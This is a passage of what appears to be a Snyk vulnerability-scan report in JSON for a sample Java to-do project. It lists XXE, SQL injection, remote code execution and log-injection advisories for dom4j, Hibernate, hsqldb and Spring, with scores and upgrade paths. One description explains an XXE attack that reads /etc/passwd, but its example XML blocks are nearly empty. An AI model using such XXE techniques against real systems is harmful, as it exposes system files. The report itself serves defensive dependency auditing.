"fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. 
These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-core@5.1.17.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - 
"isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. 
This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - 
"functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-core@5.4.24.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": 
"https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. 
This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-core@5.3.18.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - 
"[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [ - false, - "org.hsqldb:hsqldb@2.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "title": "Improper Output Neutralization for Logs", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Dennis Kennedy" - ], - "semver": { - "vulnerable": [ - "[5.3.0,5.3.12)", - "[,5.2.18)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.12", - "5.2.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", - "title": "Github Commit" - }, - { - "url": "https://pivotal.io/security/cve-2021-22096", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:20.847607Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "description": "## 
Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", - "epssDetails": { - "percentile": "0.34533", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22096" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-02T11:14:46.053186Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-10-27T12:52:59Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2021-10-27T16:55:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.086414Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.18.RELEASE", - "org.springframework:spring-core@5.2.18.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, 
- "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "psytester" - ], - "semver": { - "vulnerable": [ - "[,5.2.19.RELEASE)", - "[5.3.0,5.3.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.19.RELEASE", - "5.3.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://pivotal.io/security/cve-2021-22060", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:24.703024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "description": "## 
Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", - "epssDetails": { - "percentile": "0.23203", - "probability": "0.00054", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22060" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-06T12:31:26.181234Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-01-06T11:18:34Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2022-01-06T17:17:24.995166Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:10.667113Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.19.RELEASE", - "org.springframework:spring-core@5.2.19.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": 
